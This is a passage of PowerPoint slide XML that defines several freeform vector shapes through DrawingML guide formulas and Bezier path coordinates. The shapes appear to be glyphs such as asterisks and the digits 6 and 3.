                <a:gd name="T14" fmla="*/ 107 w 190"/>
                <a:gd name="T15" fmla="*/ 17 h 212"/>
                <a:gd name="T16" fmla="*/ 95 w 190"/>
                <a:gd name="T17" fmla="*/ 0 h 212"/>
                <a:gd name="T18" fmla="*/ 83 w 190"/>
                <a:gd name="T19" fmla="*/ 17 h 212"/>
                <a:gd name="T20" fmla="*/ 84 w 190"/>
                <a:gd name="T21" fmla="*/ 88 h 212"/>
                <a:gd name="T22" fmla="*/ 15 w 190"/>
                <a:gd name="T23" fmla="*/ 48 h 212"/>
                <a:gd name="T24" fmla="*/ 12 w 190"/>
                <a:gd name="T25" fmla="*/ 47 h 212"/>
                <a:gd name="T26" fmla="*/ 0 w 190"/>
                <a:gd name="T27" fmla="*/ 59 h 212"/>
                <a:gd name="T28" fmla="*/ 10 w 190"/>
                <a:gd name="T29" fmla="*/ 71 h 212"/>
                <a:gd name="T30" fmla="*/ 75 w 190"/>
                <a:gd name="T31" fmla="*/ 106 h 212"/>
                <a:gd name="T32" fmla="*/ 10 w 190"/>
                <a:gd name="T33" fmla="*/ 141 h 212"/>
                <a:gd name="T34" fmla="*/ 0 w 190"/>
                <a:gd name="T35" fmla="*/ 153 h 212"/>
                <a:gd name="T36" fmla="*/ 14 w 190"/>
                <a:gd name="T37" fmla="*/ 165 h 212"/>
                <a:gd name="T38" fmla="*/ 83 w 190"/>
                <a:gd name="T39" fmla="*/ 125 h 212"/>
                <a:gd name="T40" fmla="*/ 83 w 190"/>
                <a:gd name="T41" fmla="*/ 196 h 212"/>
                <a:gd name="T42" fmla="*/ 95 w 190"/>
                <a:gd name="T43" fmla="*/ 212 h 212"/>
                <a:gd name="T44" fmla="*/ 107 w 190"/>
                <a:gd name="T45" fmla="*/ 196 h 212"/>
                <a:gd name="T46" fmla="*/ 107 w 190"/>
                <a:gd name="T47" fmla="*/ 126 h 212"/>
                <a:gd name="T48" fmla="*/ 161 w 190"/>
                <a:gd name="T49" fmla="*/ 158 h 212"/>
                <a:gd name="T50" fmla="*/ 178 w 190"/>
                <a:gd name="T51" fmla="*/ 165 h 212"/>
                <a:gd name="T52" fmla="*/ 190 w 190"/>
                <a:gd name="T53" fmla="*/ 15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0" h="212">
                  <a:moveTo>
                    <a:pt x="190" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="149"/>
                    <a:pt x="187" y="146"/>
                    <a:pt x="186" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="69"/>
                    <a:pt x="190" y="66"/>
                    <a:pt x="190" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="58"/>
                    <a:pt x="189" y="48"/>
                    <a:pt x="176" y="47"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="17"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="13"/>
                    <a:pt x="107" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="13"/>
                    <a:pt x="83" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="48"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="47"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="5" y="68"/>
                    <a:pt x="10" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="141"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="143"/>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="1" y="165"/>
                    <a:pt x="14" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="199"/>
                    <a:pt x="83" y="212"/>
                    <a:pt x="95" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="212"/>
                    <a:pt x="107" y="199"/>
                    <a:pt x="107" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="165"/>
                    <a:pt x="174" y="165"/>
                    <a:pt x="178" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="165"/>
                    <a:pt x="190" y="159"/>
                    <a:pt x="190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5" name="Freeform 1161">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BB8C349-A05C-4906-89DF-E942228F3869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4110037" y="1579563"/>
              <a:ext cx="71438" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 189 w 189"/>
                <a:gd name="T1" fmla="*/ 153 h 212"/>
                <a:gd name="T2" fmla="*/ 186 w 189"/>
                <a:gd name="T3" fmla="*/ 144 h 212"/>
                <a:gd name="T4" fmla="*/ 115 w 189"/>
                <a:gd name="T5" fmla="*/ 107 h 212"/>
                <a:gd name="T6" fmla="*/ 179 w 189"/>
                <a:gd name="T7" fmla="*/ 72 h 212"/>
                <a:gd name="T8" fmla="*/ 189 w 189"/>
                <a:gd name="T9" fmla="*/ 59 h 212"/>
                <a:gd name="T10" fmla="*/ 175 w 189"/>
                <a:gd name="T11" fmla="*/ 47 h 212"/>
                <a:gd name="T12" fmla="*/ 106 w 189"/>
                <a:gd name="T13" fmla="*/ 87 h 212"/>
                <a:gd name="T14" fmla="*/ 107 w 189"/>
                <a:gd name="T15" fmla="*/ 17 h 212"/>
                <a:gd name="T16" fmla="*/ 95 w 189"/>
                <a:gd name="T17" fmla="*/ 0 h 212"/>
                <a:gd name="T18" fmla="*/ 83 w 189"/>
                <a:gd name="T19" fmla="*/ 17 h 212"/>
                <a:gd name="T20" fmla="*/ 83 w 189"/>
                <a:gd name="T21" fmla="*/ 88 h 212"/>
                <a:gd name="T22" fmla="*/ 15 w 189"/>
                <a:gd name="T23" fmla="*/ 48 h 212"/>
                <a:gd name="T24" fmla="*/ 12 w 189"/>
                <a:gd name="T25" fmla="*/ 47 h 212"/>
                <a:gd name="T26" fmla="*/ 0 w 189"/>
                <a:gd name="T27" fmla="*/ 59 h 212"/>
                <a:gd name="T28" fmla="*/ 9 w 189"/>
                <a:gd name="T29" fmla="*/ 71 h 212"/>
                <a:gd name="T30" fmla="*/ 74 w 189"/>
                <a:gd name="T31" fmla="*/ 106 h 212"/>
                <a:gd name="T32" fmla="*/ 10 w 189"/>
                <a:gd name="T33" fmla="*/ 141 h 212"/>
                <a:gd name="T34" fmla="*/ 0 w 189"/>
                <a:gd name="T35" fmla="*/ 153 h 212"/>
                <a:gd name="T36" fmla="*/ 14 w 189"/>
                <a:gd name="T37" fmla="*/ 165 h 212"/>
                <a:gd name="T38" fmla="*/ 83 w 189"/>
                <a:gd name="T39" fmla="*/ 125 h 212"/>
                <a:gd name="T40" fmla="*/ 83 w 189"/>
                <a:gd name="T41" fmla="*/ 196 h 212"/>
                <a:gd name="T42" fmla="*/ 95 w 189"/>
                <a:gd name="T43" fmla="*/ 212 h 212"/>
                <a:gd name="T44" fmla="*/ 107 w 189"/>
                <a:gd name="T45" fmla="*/ 196 h 212"/>
                <a:gd name="T46" fmla="*/ 107 w 189"/>
                <a:gd name="T47" fmla="*/ 126 h 212"/>
                <a:gd name="T48" fmla="*/ 161 w 189"/>
                <a:gd name="T49" fmla="*/ 158 h 212"/>
                <a:gd name="T50" fmla="*/ 177 w 189"/>
                <a:gd name="T51" fmla="*/ 165 h 212"/>
                <a:gd name="T52" fmla="*/ 189 w 189"/>
                <a:gd name="T53" fmla="*/ 15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212">
                  <a:moveTo>
                    <a:pt x="189" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="149"/>
                    <a:pt x="187" y="146"/>
                    <a:pt x="186" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="69"/>
                    <a:pt x="189" y="66"/>
                    <a:pt x="189" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="58"/>
                    <a:pt x="189" y="48"/>
                    <a:pt x="175" y="47"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="17"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="13"/>
                    <a:pt x="107" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="13"/>
                    <a:pt x="83" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="48"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="47"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="4" y="68"/>
                    <a:pt x="9" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="74" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="141"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="143"/>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="0" y="165"/>
                    <a:pt x="14" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="199"/>
                    <a:pt x="83" y="212"/>
                    <a:pt x="95" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="212"/>
                    <a:pt x="107" y="199"/>
                    <a:pt x="107" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="165"/>
                    <a:pt x="174" y="165"/>
                    <a:pt x="177" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="165"/>
                    <a:pt x="189" y="159"/>
                    <a:pt x="189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6" name="Freeform 1162">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B32669A7-7E4F-4F82-AFB0-DDC94C2A1E99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4208462" y="1579563"/>
              <a:ext cx="73025" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 190 w 190"/>
                <a:gd name="T1" fmla="*/ 153 h 212"/>
                <a:gd name="T2" fmla="*/ 186 w 190"/>
                <a:gd name="T3" fmla="*/ 144 h 212"/>
                <a:gd name="T4" fmla="*/ 116 w 190"/>
                <a:gd name="T5" fmla="*/ 107 h 212"/>
                <a:gd name="T6" fmla="*/ 180 w 190"/>
                <a:gd name="T7" fmla="*/ 72 h 212"/>
                <a:gd name="T8" fmla="*/ 190 w 190"/>
                <a:gd name="T9" fmla="*/ 59 h 212"/>
                <a:gd name="T10" fmla="*/ 176 w 190"/>
                <a:gd name="T11" fmla="*/ 47 h 212"/>
                <a:gd name="T12" fmla="*/ 107 w 190"/>
                <a:gd name="T13" fmla="*/ 87 h 212"/>
                <a:gd name="T14" fmla="*/ 107 w 190"/>
                <a:gd name="T15" fmla="*/ 17 h 212"/>
                <a:gd name="T16" fmla="*/ 95 w 190"/>
                <a:gd name="T17" fmla="*/ 0 h 212"/>
                <a:gd name="T18" fmla="*/ 83 w 190"/>
                <a:gd name="T19" fmla="*/ 17 h 212"/>
                <a:gd name="T20" fmla="*/ 84 w 190"/>
                <a:gd name="T21" fmla="*/ 88 h 212"/>
                <a:gd name="T22" fmla="*/ 15 w 190"/>
                <a:gd name="T23" fmla="*/ 48 h 212"/>
                <a:gd name="T24" fmla="*/ 12 w 190"/>
                <a:gd name="T25" fmla="*/ 47 h 212"/>
                <a:gd name="T26" fmla="*/ 0 w 190"/>
                <a:gd name="T27" fmla="*/ 59 h 212"/>
                <a:gd name="T28" fmla="*/ 10 w 190"/>
                <a:gd name="T29" fmla="*/ 71 h 212"/>
                <a:gd name="T30" fmla="*/ 75 w 190"/>
                <a:gd name="T31" fmla="*/ 106 h 212"/>
                <a:gd name="T32" fmla="*/ 10 w 190"/>
                <a:gd name="T33" fmla="*/ 141 h 212"/>
                <a:gd name="T34" fmla="*/ 0 w 190"/>
                <a:gd name="T35" fmla="*/ 153 h 212"/>
                <a:gd name="T36" fmla="*/ 14 w 190"/>
                <a:gd name="T37" fmla="*/ 165 h 212"/>
                <a:gd name="T38" fmla="*/ 83 w 190"/>
                <a:gd name="T39" fmla="*/ 125 h 212"/>
                <a:gd name="T40" fmla="*/ 83 w 190"/>
                <a:gd name="T41" fmla="*/ 196 h 212"/>
                <a:gd name="T42" fmla="*/ 95 w 190"/>
                <a:gd name="T43" fmla="*/ 212 h 212"/>
                <a:gd name="T44" fmla="*/ 107 w 190"/>
                <a:gd name="T45" fmla="*/ 196 h 212"/>
                <a:gd name="T46" fmla="*/ 107 w 190"/>
                <a:gd name="T47" fmla="*/ 126 h 212"/>
                <a:gd name="T48" fmla="*/ 161 w 190"/>
                <a:gd name="T49" fmla="*/ 158 h 212"/>
                <a:gd name="T50" fmla="*/ 178 w 190"/>
                <a:gd name="T51" fmla="*/ 165 h 212"/>
                <a:gd name="T52" fmla="*/ 190 w 190"/>
                <a:gd name="T53" fmla="*/ 15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0" h="212">
                  <a:moveTo>
                    <a:pt x="190" y="153"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="149"/>
                    <a:pt x="187" y="146"/>
                    <a:pt x="186" y="144"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="116" y="107"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180" y="72"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="69"/>
                    <a:pt x="190" y="66"/>
                    <a:pt x="190" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="58"/>
                    <a:pt x="189" y="48"/>
                    <a:pt x="176" y="47"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="87"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="107" y="17"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="13"/>
                    <a:pt x="107" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="0"/>
                    <a:pt x="83" y="13"/>
                    <a:pt x="83" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="84" y="88"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15" y="48"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="47"/>
                    <a:pt x="12" y="47"/>
                    <a:pt x="12" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="47"/>
                    <a:pt x="0" y="54"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="66"/>
                    <a:pt x="5" y="68"/>
                    <a:pt x="10" y="71"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="75" y="106"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10" y="141"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="143"/>
                    <a:pt x="0" y="147"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="155"/>
                    <a:pt x="1" y="165"/>
                    <a:pt x="14" y="165"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="83" y="125"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83" y="196"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="199"/>
                    <a:pt x="83" y="212"/>
                    <a:pt x="95" y="212"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="212"/>
                    <a:pt x="107" y="199"/>
                    <a:pt x="107" y="196"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="107" y="126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161" y="158"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="165"/>
                    <a:pt x="174" y="165"/>
                    <a:pt x="178" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="165"/>
                    <a:pt x="190" y="159"/>
                    <a:pt x="190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7" name="Freeform 1163">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306152A3-3665-480F-96E4-514796E67B7C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4335462" y="1658938"/>
              <a:ext cx="20638" cy="20638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8" name="Freeform 1164">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5216A27-0592-4030-8BB6-DF39461805D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId160"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4406900" y="1558925"/>
              <a:ext cx="77788" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 206 w 206"/>
                <a:gd name="T1" fmla="*/ 216 h 316"/>
                <a:gd name="T2" fmla="*/ 109 w 206"/>
                <a:gd name="T3" fmla="*/ 117 h 316"/>
                <a:gd name="T4" fmla="*/ 25 w 206"/>
                <a:gd name="T5" fmla="*/ 155 h 316"/>
                <a:gd name="T6" fmla="*/ 133 w 206"/>
                <a:gd name="T7" fmla="*/ 21 h 316"/>
                <a:gd name="T8" fmla="*/ 169 w 206"/>
                <a:gd name="T9" fmla="*/ 35 h 316"/>
                <a:gd name="T10" fmla="*/ 162 w 206"/>
                <a:gd name="T11" fmla="*/ 50 h 316"/>
                <a:gd name="T12" fmla="*/ 179 w 206"/>
                <a:gd name="T13" fmla="*/ 67 h 316"/>
                <a:gd name="T14" fmla="*/ 197 w 206"/>
                <a:gd name="T15" fmla="*/ 48 h 316"/>
                <a:gd name="T16" fmla="*/ 134 w 206"/>
                <a:gd name="T17" fmla="*/ 0 h 316"/>
                <a:gd name="T18" fmla="*/ 0 w 206"/>
                <a:gd name="T19" fmla="*/ 162 h 316"/>
                <a:gd name="T20" fmla="*/ 104 w 206"/>
                <a:gd name="T21" fmla="*/ 316 h 316"/>
                <a:gd name="T22" fmla="*/ 206 w 206"/>
                <a:gd name="T23" fmla="*/ 216 h 316"/>
                <a:gd name="T24" fmla="*/ 180 w 206"/>
                <a:gd name="T25" fmla="*/ 216 h 316"/>
                <a:gd name="T26" fmla="*/ 104 w 206"/>
                <a:gd name="T27" fmla="*/ 295 h 316"/>
                <a:gd name="T28" fmla="*/ 35 w 206"/>
                <a:gd name="T29" fmla="*/ 235 h 316"/>
                <a:gd name="T30" fmla="*/ 31 w 206"/>
                <a:gd name="T31" fmla="*/ 201 h 316"/>
                <a:gd name="T32" fmla="*/ 106 w 206"/>
                <a:gd name="T33" fmla="*/ 139 h 316"/>
                <a:gd name="T34" fmla="*/ 180 w 206"/>
                <a:gd name="T35" fmla="*/ 2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316">
                  <a:moveTo>
                    <a:pt x="206" y="216"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="206" y="161"/>
                    <a:pt x="163" y="117"/>
                    <a:pt x="109" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="117"/>
                    <a:pt x="58" y="125"/>
                    <a:pt x="25" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="65"/>
                    <a:pt x="86" y="21"/>
                    <a:pt x="133" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="21"/>
                    <a:pt x="162" y="28"/>
                    <a:pt x="169" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="40"/>
                    <a:pt x="162" y="43"/>
                    <a:pt x="162" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="59"/>
                    <a:pt x="169" y="67"/>
                    <a:pt x="179" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="189" y="67"/>
                    <a:pt x="197" y="60"/>
                    <a:pt x="197" y="48"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="25"/>
                    <a:pt x="179" y="0"/>
                    <a:pt x="134" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="0"/>
                    <a:pt x="0" y="61"/>
                    <a:pt x="0" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="279"/>
                    <a:pt x="55" y="316"/>
                    <a:pt x="104" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="316"/>
                    <a:pt x="206" y="275"/>
                    <a:pt x="206" y="216"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="180" y="216"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="264"/>
                    <a:pt x="144" y="295"/>
                    <a:pt x="104" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="295"/>
                    <a:pt x="46" y="269"/>
                    <a:pt x="35" y="235"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="227"/>
                    <a:pt x="31" y="213"/>
                    <a:pt x="31" y="201"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="167"/>
                    <a:pt x="64" y="139"/>
                    <a:pt x="106" y="139"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="139"/>
                    <a:pt x="180" y="175"/>
                    <a:pt x="18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9" name="Freeform 1165">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3FEBF18-6A8F-4EAC-AF3D-3C21467C0CE2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4505325" y="1558925"/>
              <a:ext cx="80963" cy="123825"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 214 w 214"/>
                <a:gd name="T1" fmla="*/ 226 h 316"/>
                <a:gd name="T2" fmla="*/ 150 w 214"/>
                <a:gd name="T3" fmla="*/ 145 h 316"/>
                <a:gd name="T4" fmla="*/ 199 w 214"/>
                <a:gd name="T5" fmla="*/ 68 h 316"/>
                <a:gd name="T6" fmla="*/ 107 w 214"/>
                <a:gd name="T7" fmla="*/ 0 h 316"/>
                <a:gd name="T8" fmla="*/ 14 w 214"/>
                <a:gd name="T9" fmla="*/ 55 h 316"/>
                <a:gd name="T10" fmla="*/ 32 w 214"/>
                <a:gd name="T11" fmla="*/ 75 h 316"/>
                <a:gd name="T12" fmla="*/ 50 w 214"/>
                <a:gd name="T13" fmla="*/ 56 h 316"/>
                <a:gd name="T14" fmla="*/ 43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0 w 214"/>
                <a:gd name="T21" fmla="*/ 117 h 316"/>
                <a:gd name="T22" fmla="*/ 99 w 214"/>
                <a:gd name="T23" fmla="*/ 134 h 316"/>
                <a:gd name="T24" fmla="*/ 67 w 214"/>
                <a:gd name="T25" fmla="*/ 146 h 316"/>
                <a:gd name="T26" fmla="*/ 82 w 214"/>
                <a:gd name="T27" fmla="*/ 157 h 316"/>
                <a:gd name="T28" fmla="*/ 106 w 214"/>
                <a:gd name="T29" fmla="*/ 157 h 316"/>
                <a:gd name="T30" fmla="*/ 188 w 214"/>
                <a:gd name="T31" fmla="*/ 226 h 316"/>
                <a:gd name="T32" fmla="*/ 108 w 214"/>
                <a:gd name="T33" fmla="*/ 295 h 316"/>
                <a:gd name="T34" fmla="*/ 27 w 214"/>
                <a:gd name="T35" fmla="*/ 259 h 316"/>
                <a:gd name="T36" fmla="*/ 35 w 214"/>
                <a:gd name="T37" fmla="*/ 244 h 316"/>
                <a:gd name="T38" fmla="*/ 17 w 214"/>
                <a:gd name="T39" fmla="*/ 226 h 316"/>
                <a:gd name="T40" fmla="*/ 0 w 214"/>
                <a:gd name="T41" fmla="*/ 246 h 316"/>
                <a:gd name="T42" fmla="*/ 108 w 214"/>
                <a:gd name="T43" fmla="*/ 316 h 316"/>
                <a:gd name="T44" fmla="*/ 214 w 214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91"/>
                    <a:pt x="191" y="163"/>
                    <a:pt x="150" y="145"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="122"/>
                    <a:pt x="199" y="94"/>
                    <a:pt x="199" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="199" y="32"/>
                    <a:pt x="163" y="0"/>
                    <a:pt x="107" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="14" y="22"/>
                    <a:pt x="14" y="55"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="69"/>
                    <a:pt x="24" y="75"/>
                    <a:pt x="32" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="75"/>
                    <a:pt x="50" y="68"/>
                    <a:pt x="50" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="51"/>
                    <a:pt x="48" y="47"/>
                    <a:pt x="43" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="22"/>
                    <a:pt x="103" y="21"/>
                    <a:pt x="108" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="21"/>
                    <a:pt x="174" y="43"/>
                    <a:pt x="174" y="68"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="85"/>
                    <a:pt x="166" y="105"/>
                    <a:pt x="150" y="117"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="132"/>
                    <a:pt x="119" y="133"/>
                    <a:pt x="99" y="134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="136"/>
                    <a:pt x="67" y="136"/>
                    <a:pt x="67" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="157"/>
                    <a:pt x="76" y="157"/>
                    <a:pt x="82" y="157"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="106" y="157"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="157"/>
                    <a:pt x="188" y="194"/>
                    <a:pt x="188" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="260"/>
                    <a:pt x="158" y="295"/>
                    <a:pt x="108" y="295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
